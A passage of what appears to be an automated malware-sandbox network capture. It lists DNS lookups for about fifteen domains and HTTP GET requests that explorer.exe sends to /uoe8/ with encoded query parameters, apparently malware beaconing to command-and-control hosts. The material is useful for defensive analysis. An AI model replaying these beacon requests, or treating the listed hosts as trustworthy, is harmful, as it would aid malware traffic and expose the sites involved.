                                                                            Apr 12, 2021 10:07:24.153532982 CEST8049733184.168.131.241192.168.2.3
                                                                            Apr 12, 2021 10:07:29.356569052 CEST4973480192.168.2.381.169.145.72
                                                                            Apr 12, 2021 10:07:29.401223898 CEST804973481.169.145.72192.168.2.3
                                                                            Apr 12, 2021 10:07:29.401335001 CEST4973480192.168.2.381.169.145.72
                                                                            Apr 12, 2021 10:07:29.401462078 CEST4973480192.168.2.381.169.145.72
                                                                            Apr 12, 2021 10:07:29.444474936 CEST804973481.169.145.72192.168.2.3
                                                                            Apr 12, 2021 10:07:29.445220947 CEST804973481.169.145.72192.168.2.3
                                                                            Apr 12, 2021 10:07:29.445246935 CEST804973481.169.145.72192.168.2.3
                                                                            Apr 12, 2021 10:07:29.445405960 CEST4973480192.168.2.381.169.145.72
                                                                            Apr 12, 2021 10:07:29.445473909 CEST4973480192.168.2.381.169.145.72
                                                                            Apr 12, 2021 10:07:29.488337994 CEST804973481.169.145.72192.168.2.3
                                                                            Apr 12, 2021 10:07:39.663939953 CEST4973680192.168.2.334.102.136.180
                                                                            Apr 12, 2021 10:07:39.704849958 CEST804973634.102.136.180192.168.2.3
                                                                            Apr 12, 2021 10:07:39.705004930 CEST4973680192.168.2.334.102.136.180
                                                                            Apr 12, 2021 10:07:39.705074072 CEST4973680192.168.2.334.102.136.180
                                                                            Apr 12, 2021 10:07:39.746352911 CEST804973634.102.136.180192.168.2.3
                                                                            Apr 12, 2021 10:07:39.845865965 CEST804973634.102.136.180192.168.2.3
                                                                            Apr 12, 2021 10:07:39.845899105 CEST804973634.102.136.180192.168.2.3
                                                                            Apr 12, 2021 10:07:39.846086979 CEST4973680192.168.2.334.102.136.180
                                                                            Apr 12, 2021 10:07:39.846163034 CEST4973680192.168.2.334.102.136.180
                                                                            Apr 12, 2021 10:07:39.888463020 CEST804973634.102.136.180192.168.2.3

                                                                            UDP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Apr 12, 2021 10:05:20.122581005 CEST5020053192.168.2.38.8.8.8
                                                                            Apr 12, 2021 10:05:20.171334982 CEST53502008.8.8.8192.168.2.3
                                                                            Apr 12, 2021 10:05:22.757194042 CEST5128153192.168.2.38.8.8.8
                                                                            Apr 12, 2021 10:05:22.820715904 CEST53512818.8.8.8192.168.2.3
                                                                            Apr 12, 2021 10:05:27.343539000 CEST4919953192.168.2.38.8.8.8
                                                                            Apr 12, 2021 10:05:27.392163992 CEST53491998.8.8.8192.168.2.3
                                                                            Apr 12, 2021 10:05:29.547214031 CEST5062053192.168.2.38.8.8.8
                                                                            Apr 12, 2021 10:05:29.596024990 CEST53506208.8.8.8192.168.2.3
                                                                            Apr 12, 2021 10:05:32.684887886 CEST6493853192.168.2.38.8.8.8
                                                                            Apr 12, 2021 10:05:32.736320972 CEST53649388.8.8.8192.168.2.3
                                                                            Apr 12, 2021 10:05:53.382253885 CEST6015253192.168.2.38.8.8.8
                                                                            Apr 12, 2021 10:05:53.450334072 CEST53601528.8.8.8192.168.2.3
                                                                            Apr 12, 2021 10:05:58.541904926 CEST5754453192.168.2.38.8.8.8
                                                                            Apr 12, 2021 10:05:58.590631008 CEST53575448.8.8.8192.168.2.3
                                                                            Apr 12, 2021 10:06:06.595482111 CEST5598453192.168.2.38.8.8.8
                                                                            Apr 12, 2021 10:06:06.644294024 CEST53559848.8.8.8192.168.2.3
                                                                            Apr 12, 2021 10:06:12.612741947 CEST6418553192.168.2.38.8.8.8
                                                                            Apr 12, 2021 10:06:12.694369078 CEST53641858.8.8.8192.168.2.3
                                                                            Apr 12, 2021 10:06:15.645478010 CEST6511053192.168.2.38.8.8.8
                                                                            Apr 12, 2021 10:06:15.694255114 CEST53651108.8.8.8192.168.2.3
                                                                            Apr 12, 2021 10:06:17.895628929 CEST5836153192.168.2.38.8.8.8
                                                                            Apr 12, 2021 10:06:17.974059105 CEST53583618.8.8.8192.168.2.3
                                                                            Apr 12, 2021 10:06:19.354692936 CEST6349253192.168.2.38.8.8.8
                                                                            Apr 12, 2021 10:06:19.413697004 CEST53634928.8.8.8192.168.2.3
                                                                            Apr 12, 2021 10:06:23.741298914 CEST6083153192.168.2.38.8.8.8
                                                                            Apr 12, 2021 10:06:23.935321093 CEST53608318.8.8.8192.168.2.3
                                                                            Apr 12, 2021 10:06:27.774446011 CEST6010053192.168.2.38.8.8.8
                                                                            Apr 12, 2021 10:06:27.826001883 CEST53601008.8.8.8192.168.2.3
                                                                            Apr 12, 2021 10:06:29.279805899 CEST5319553192.168.2.38.8.8.8
                                                                            Apr 12, 2021 10:06:29.378269911 CEST53531958.8.8.8192.168.2.3
                                                                            Apr 12, 2021 10:06:35.918772936 CEST5014153192.168.2.38.8.8.8
                                                                            Apr 12, 2021 10:06:35.982625008 CEST53501418.8.8.8192.168.2.3
                                                                            Apr 12, 2021 10:06:36.155713081 CEST5302353192.168.2.38.8.8.8
                                                                            Apr 12, 2021 10:06:36.227798939 CEST53530238.8.8.8192.168.2.3
                                                                            Apr 12, 2021 10:06:38.703079939 CEST4956353192.168.2.38.8.8.8
                                                                            Apr 12, 2021 10:06:38.754638910 CEST53495638.8.8.8192.168.2.3
                                                                            Apr 12, 2021 10:06:39.501672983 CEST5135253192.168.2.38.8.8.8
                                                                            Apr 12, 2021 10:06:39.590591908 CEST53513528.8.8.8192.168.2.3
                                                                            Apr 12, 2021 10:06:42.907608032 CEST5934953192.168.2.38.8.8.8
                                                                            Apr 12, 2021 10:06:42.956401110 CEST53593498.8.8.8192.168.2.3
                                                                            Apr 12, 2021 10:06:43.847261906 CEST5708453192.168.2.38.8.8.8
                                                                            Apr 12, 2021 10:06:43.896080017 CEST53570848.8.8.8192.168.2.3
                                                                            Apr 12, 2021 10:06:44.767106056 CEST5882353192.168.2.38.8.8.8
                                                                            Apr 12, 2021 10:06:45.027236938 CEST53588238.8.8.8192.168.2.3
                                                                            Apr 12, 2021 10:06:45.253624916 CEST5756853192.168.2.38.8.8.8
                                                                            Apr 12, 2021 10:06:45.313050985 CEST53575688.8.8.8192.168.2.3
                                                                            Apr 12, 2021 10:06:50.511313915 CEST5054053192.168.2.38.8.8.8
                                                                            Apr 12, 2021 10:06:50.675977945 CEST53505408.8.8.8192.168.2.3
                                                                            Apr 12, 2021 10:06:52.377207994 CEST5436653192.168.2.38.8.8.8
                                                                            Apr 12, 2021 10:06:52.426156998 CEST53543668.8.8.8192.168.2.3
                                                                            Apr 12, 2021 10:06:55.946742058 CEST5303453192.168.2.38.8.8.8
                                                                            Apr 12, 2021 10:06:56.030133963 CEST53530348.8.8.8192.168.2.3
                                                                            Apr 12, 2021 10:07:01.284339905 CEST5776253192.168.2.38.8.8.8
                                                                            Apr 12, 2021 10:07:01.374114037 CEST53577628.8.8.8192.168.2.3
                                                                            Apr 12, 2021 10:07:06.384825945 CEST5543553192.168.2.38.8.8.8
                                                                            Apr 12, 2021 10:07:06.476445913 CEST53554358.8.8.8192.168.2.3
                                                                            Apr 12, 2021 10:07:10.516870975 CEST5071353192.168.2.38.8.8.8
                                                                            Apr 12, 2021 10:07:10.594377041 CEST53507138.8.8.8192.168.2.3
                                                                            Apr 12, 2021 10:07:11.618877888 CEST5613253192.168.2.38.8.8.8
                                                                            Apr 12, 2021 10:07:11.728017092 CEST53561328.8.8.8192.168.2.3
                                                                            Apr 12, 2021 10:07:12.890963078 CEST5898753192.168.2.38.8.8.8
                                                                            Apr 12, 2021 10:07:12.939604044 CEST53589878.8.8.8192.168.2.3
                                                                            Apr 12, 2021 10:07:14.240698099 CEST5657953192.168.2.38.8.8.8
                                                                            Apr 12, 2021 10:07:14.289510965 CEST53565798.8.8.8192.168.2.3
                                                                            Apr 12, 2021 10:07:16.765417099 CEST6063353192.168.2.38.8.8.8
                                                                            Apr 12, 2021 10:07:16.814090014 CEST53606338.8.8.8192.168.2.3
                                                                            Apr 12, 2021 10:07:17.345175982 CEST6129253192.168.2.38.8.8.8
                                                                            Apr 12, 2021 10:07:17.966291904 CEST53612928.8.8.8192.168.2.3
                                                                            Apr 12, 2021 10:07:23.420985937 CEST6361953192.168.2.38.8.8.8
                                                                            Apr 12, 2021 10:07:23.506768942 CEST53636198.8.8.8192.168.2.3
                                                                            Apr 12, 2021 10:07:28.965080976 CEST6493853192.168.2.38.8.8.8
                                                                            Apr 12, 2021 10:07:29.043720007 CEST53649388.8.8.8192.168.2.3
                                                                            Apr 12, 2021 10:07:34.469288111 CEST6194653192.168.2.38.8.8.8
                                                                            Apr 12, 2021 10:07:34.549664021 CEST53619468.8.8.8192.168.2.3

                                                                            DNS Queries

                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                            Apr 12, 2021 10:06:12.612741947 CEST192.168.2.38.8.8.80xe041Standard query (0)www.fibermover.comA (IP address)IN (0x0001)
                                                                            Apr 12, 2021 10:06:17.895628929 CEST192.168.2.38.8.8.80xb7acStandard query (0)www.mojilifenoosa.comA (IP address)IN (0x0001)
                                                                            Apr 12, 2021 10:06:23.741298914 CEST192.168.2.38.8.8.80x8bdStandard query (0)www.7chd.comA (IP address)IN (0x0001)
                                                                            Apr 12, 2021 10:06:29.279805899 CEST192.168.2.38.8.8.80x4b0Standard query (0)www.bl927.comA (IP address)IN (0x0001)
                                                                            Apr 12, 2021 10:06:39.501672983 CEST192.168.2.38.8.8.80xd579Standard query (0)www.hispekdiamond.comA (IP address)IN (0x0001)
                                                                            Apr 12, 2021 10:06:44.767106056 CEST192.168.2.38.8.8.80xaf00Standard query (0)www.swashbug.comA (IP address)IN (0x0001)
                                                                            Apr 12, 2021 10:06:50.511313915 CEST192.168.2.38.8.8.80x2d44Standard query (0)www.zagorafinancial.comA (IP address)IN (0x0001)
                                                                            Apr 12, 2021 10:06:55.946742058 CEST192.168.2.38.8.8.80xdd2dStandard query (0)www.funnyfootballmugs.comA (IP address)IN (0x0001)
                                                                            Apr 12, 2021 10:07:01.284339905 CEST192.168.2.38.8.8.80xffffStandard query (0)www.cdefenders.comA (IP address)IN (0x0001)
                                                                            Apr 12, 2021 10:07:06.384825945 CEST192.168.2.38.8.8.80x8c4Standard query (0)www.przyczepy.netA (IP address)IN (0x0001)
                                                                            Apr 12, 2021 10:07:11.618877888 CEST192.168.2.38.8.8.80x4de7Standard query (0)www.borderlesstrade.infoA (IP address)IN (0x0001)
                                                                            Apr 12, 2021 10:07:17.345175982 CEST192.168.2.38.8.8.80x7657Standard query (0)www.3992199.comA (IP address)IN (0x0001)
                                                                            Apr 12, 2021 10:07:23.420985937 CEST192.168.2.38.8.8.80x1eb0Standard query (0)www.montcoimmigrationlawyer.comA (IP address)IN (0x0001)
                                                                            Apr 12, 2021 10:07:28.965080976 CEST192.168.2.38.8.8.80xfa46Standard query (0)www.missjeschickt.comA (IP address)IN (0x0001)
                                                                            Apr 12, 2021 10:07:34.469288111 CEST192.168.2.38.8.8.80x436eStandard query (0)www.plaisterpress.comA (IP address)IN (0x0001)

                                                                            DNS Answers

                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                            Apr 12, 2021 10:06:12.694369078 CEST8.8.8.8192.168.2.30xe041No error (0)www.fibermover.comfibermover.comCNAME (Canonical name)IN (0x0001)
                                                                            Apr 12, 2021 10:06:12.694369078 CEST8.8.8.8192.168.2.30xe041No error (0)fibermover.com34.102.136.180A (IP address)IN (0x0001)
                                                                            Apr 12, 2021 10:06:17.974059105 CEST8.8.8.8192.168.2.30xb7acNo error (0)www.mojilifenoosa.commojilifenoosa.comCNAME (Canonical name)IN (0x0001)
                                                                            Apr 12, 2021 10:06:17.974059105 CEST8.8.8.8192.168.2.30xb7acNo error (0)mojilifenoosa.com184.168.131.241A (IP address)IN (0x0001)
                                                                            Apr 12, 2021 10:06:23.935321093 CEST8.8.8.8192.168.2.30x8bdNo error (0)www.7chd.comprod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                            Apr 12, 2021 10:06:23.935321093 CEST8.8.8.8192.168.2.30x8bdNo error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com52.15.160.167A (IP address)IN (0x0001)
                                                                            Apr 12, 2021 10:06:23.935321093 CEST8.8.8.8192.168.2.30x8bdNo error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com3.14.206.30A (IP address)IN (0x0001)
                                                                            Apr 12, 2021 10:06:23.935321093 CEST8.8.8.8192.168.2.30x8bdNo error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com3.13.255.157A (IP address)IN (0x0001)
                                                                            Apr 12, 2021 10:06:29.378269911 CEST8.8.8.8192.168.2.30x4b0Name error (3)www.bl927.comnonenoneA (IP address)IN (0x0001)
                                                                            Apr 12, 2021 10:06:39.590591908 CEST8.8.8.8192.168.2.30xd579No error (0)www.hispekdiamond.com213.171.195.105A (IP address)IN (0x0001)
                                                                            Apr 12, 2021 10:06:45.027236938 CEST8.8.8.8192.168.2.30xaf00No error (0)www.swashbug.com169.1.24.244A (IP address)IN (0x0001)
                                                                            Apr 12, 2021 10:06:50.675977945 CEST8.8.8.8192.168.2.30x2d44No error (0)www.zagorafinancial.comzagorafinancial.comCNAME (Canonical name)IN (0x0001)
                                                                            Apr 12, 2021 10:06:50.675977945 CEST8.8.8.8192.168.2.30x2d44No error (0)zagorafinancial.com162.209.114.201A (IP address)IN (0x0001)
                                                                            Apr 12, 2021 10:06:56.030133963 CEST8.8.8.8192.168.2.30xdd2dNo error (0)www.funnyfootballmugs.comfunny-football-mugs.myshopify.comCNAME (Canonical name)IN (0x0001)
                                                                            Apr 12, 2021 10:06:56.030133963 CEST8.8.8.8192.168.2.30xdd2dNo error (0)funny-football-mugs.myshopify.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)
                                                                            Apr 12, 2021 10:06:56.030133963 CEST8.8.8.8192.168.2.30xdd2dNo error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)
                                                                            Apr 12, 2021 10:07:01.374114037 CEST8.8.8.8192.168.2.30xffffName error (3)www.cdefenders.comnonenoneA (IP address)IN (0x0001)
                                                                            Apr 12, 2021 10:07:06.476445913 CEST8.8.8.8192.168.2.30x8c4No error (0)www.przyczepy.net185.253.212.22A (IP address)IN (0x0001)
                                                                            Apr 12, 2021 10:07:11.728017092 CEST8.8.8.8192.168.2.30x4de7No error (0)www.borderlesstrade.infowww.borderlesstrade.info.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                                            Apr 12, 2021 10:07:17.966291904 CEST8.8.8.8192.168.2.30x7657No error (0)www.3992199.comk9cdna.51w4.comCNAME (Canonical name)IN (0x0001)
                                                                            Apr 12, 2021 10:07:17.966291904 CEST8.8.8.8192.168.2.30x7657No error (0)k9cdna.51w4.com45.142.156.44A (IP address)IN (0x0001)
                                                                            Apr 12, 2021 10:07:23.506768942 CEST8.8.8.8192.168.2.30x1eb0No error (0)www.montcoimmigrationlawyer.commontcoimmigrationlawyer.comCNAME (Canonical name)IN (0x0001)
                                                                            Apr 12, 2021 10:07:23.506768942 CEST8.8.8.8192.168.2.30x1eb0No error (0)montcoimmigrationlawyer.com184.168.131.241A (IP address)IN (0x0001)
                                                                            Apr 12, 2021 10:07:29.043720007 CEST8.8.8.8192.168.2.30xfa46No error (0)www.missjeschickt.commissjeschickt.comCNAME (Canonical name)IN (0x0001)
                                                                            Apr 12, 2021 10:07:29.043720007 CEST8.8.8.8192.168.2.30xfa46No error (0)missjeschickt.com81.169.145.72A (IP address)IN (0x0001)
                                                                            Apr 12, 2021 10:07:34.549664021 CEST8.8.8.8192.168.2.30x436eNo error (0)www.plaisterpress.com104.21.24.135A (IP address)IN (0x0001)
                                                                            Apr 12, 2021 10:07:34.549664021 CEST8.8.8.8192.168.2.30x436eNo error (0)www.plaisterpress.com172.67.218.244A (IP address)IN (0x0001)

                                                                            HTTP Request Dependency Graph

                                                                            • www.fibermover.com
                                                                            • www.mojilifenoosa.com
                                                                            • www.7chd.com
                                                                            • www.hispekdiamond.com
                                                                            • www.swashbug.com
                                                                            • www.zagorafinancial.com
                                                                            • www.funnyfootballmugs.com
                                                                            • www.przyczepy.net
                                                                            • www.3992199.com
                                                                            • www.montcoimmigrationlawyer.com
                                                                            • www.missjeschickt.com

                                                                            HTTP Packets

                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            0192.168.2.34970934.102.136.18080C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Apr 12, 2021 10:06:12.742605925 CEST1025OUTGET /uoe8/?Dnh8=6wr609Vx9lIYE8xJyDK49BerhrrLsGkNJqd9AfCiKUtPUCt4zBl+uaOpo8ym8tjcWxTe&pPB=K2MxltkHBDK4hDMp HTTP/1.1
                                                                            Host: www.fibermover.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Apr 12, 2021 10:06:12.886359930 CEST1026INHTTP/1.1 403 Forbidden
                                                                            Server: openresty
                                                                            Date: Mon, 12 Apr 2021 08:06:12 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 275
                                                                            ETag: "6070a8c0-113"
                                                                            Via: 1.1 google
                                                                            Connection: close
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            1192.168.2.349711184.168.131.24180C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Apr 12, 2021 10:06:18.181508064 CEST1029OUTGET /uoe8/?Dnh8=CVv7qMV6HbciCWFzqhUZZAQ0US+YdWqRbJ1eYpd5+PQQEEyRiYk8iw/aqhx7FohNRjRK&pPB=K2MxltkHBDK4hDMp HTTP/1.1
                                                                            Host: www.mojilifenoosa.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Apr 12, 2021 10:06:18.420839071 CEST1029INHTTP/1.1 301 Moved Permanently
                                                                            Server: nginx/1.16.1
                                                                            Date: Mon, 12 Apr 2021 08:06:18 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Location: http://www.mojiproducts.com/register?Dnh8=CVv7qMV6HbciCWFzqhUZZAQ0US+YdWqRbJ1eYpd5+PQQEEyRiYk8iw/aqhx7FohNRjRK&pPB=K2MxltkHBDK4hDMp
                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            10192.168.2.34973481.169.145.7280C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Apr 12, 2021 10:07:29.401462078 CEST5087OUTGET /uoe8/?Dnh8=4x9Go+G4sQK1bPcn4vkzPWadXV0GNuVhhd/eQWnbDPmuQCX7Nztt7R8hTxXUs1RW0ALQ&pPB=K2MxltkHBDK4hDMp HTTP/1.1
                                                                            Host: www.missjeschickt.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Apr 12, 2021 10:07:29.445220947 CEST5088INHTTP/1.1 404 Not Found
                                                                            Date: Mon, 12 Apr 2021 08:07:29 GMT
                                                                            Server: Apache/2.4.46 (Unix)
                                                                            Content-Length: 196
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            11192.168.2.34973634.102.136.18080C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Apr 12, 2021 10:07:39.705074072 CEST5090OUTGET /uoe8/?Dnh8=6wr609Vx9lIYE8xJyDK49BerhrrLsGkNJqd9AfCiKUtPUCt4zBl+uaOpo8ym8tjcWxTe&pPB=K2MxltkHBDK4hDMp HTTP/1.1
                                                                            Host: www.fibermover.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Apr 12, 2021 10:07:39.845865965 CEST5091INHTTP/1.1 403 Forbidden
                                                                            Server: openresty
                                                                            Date: Mon, 12 Apr 2021 08:07:39 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 275
                                                                            ETag: "6070a8c0-113"
                                                                            Via: 1.1 google
                                                                            Connection: close
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            2192.168.2.34971352.15.160.16780C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Apr 12, 2021 10:06:24.103583097 CEST1034OUTGET /uoe8/?Dnh8=pp2ekQWroypTFKaJa5Qkcd1bUyGAkfDbiqxtSX5G9L70Cmz7PeGJVxgmdicR3ONQ4/wh&pPB=K2MxltkHBDK4hDMp HTTP/1.1
                                                                            Host: www.7chd.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Apr 12, 2021 10:06:24.241137028 CEST1035INHTTP/1.1 404 Not Found
                                                                            Date: Mon, 12 Apr 2021 08:06:24 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 153
                                                                            Connection: close
                                                                            Server: nginx/1.16.1
                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            3192.168.2.349718213.171.195.10580C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Apr 12, 2021 10:06:39.648039103 CEST4176OUTGET /uoe8/?Dnh8=UhlVi8jLiQUXpO3Mm3lJbnFIbsRb97T5i2flOgFV3YbeH0Xk3z/nbJUyPEwPPltkxnEn&pPB=K2MxltkHBDK4hDMp HTTP/1.1
                                                                            Host: www.hispekdiamond.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Apr 12, 2021 10:06:39.703871965 CEST4176INHTTP/1.1 200 OK
                                                                            Server: nginx/1.16.1
                                                                            Date: Mon, 12 Apr 2021 08:06:39 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 1358
                                                                            Last-Modified: Wed, 02 Sep 2015 11:05:06 GMT
                                                                            Connection: close
                                                                            ETag: "55e6d7e2-54e"
                                                                            Accept-Ranges: bytes
                                                                            Apr 12, 2021 10:06:39.703888893 CEST4177INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79
                                                                            Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <style type="text/css"> html, body, #partner, iframe { height:100%; width:100%; margin:0; padd
                                                                            Apr 12, 2021 10:06:39.703958988 CEST4177INData Raw: 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: </body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            4192.168.2.349721169.1.24.24480C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Apr 12, 2021 10:06:45.261780977 CEST4999OUTGET /uoe8/?Dnh8=jbWl/12JT1iDRb0v1vq5On9CelmHmR3hJr6gjt0xDgcmriA4IMeiSysiloI+majB4Luo&pPB=K2MxltkHBDK4hDMp HTTP/1.1
                                                                            Host: www.swashbug.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Apr 12, 2021 10:06:45.496073008 CEST5000INHTTP/1.1 200 OK
                                                                            Server: nginx
                                                                            Date: Mon, 12 Apr 2021 08:06:45 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 389
                                                                            Last-Modified: Tue, 28 Apr 2020 08:37:12 GMT
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            ETag: "5ea7eb38-185"
                                                                            X-XSS-Protection: 1; mode=block
                                                                            X-Content-Type-Options: nosniff
                                                                            X-Server-Powered-By: AfrRouter
                                                                            Accept-Ranges: bytes
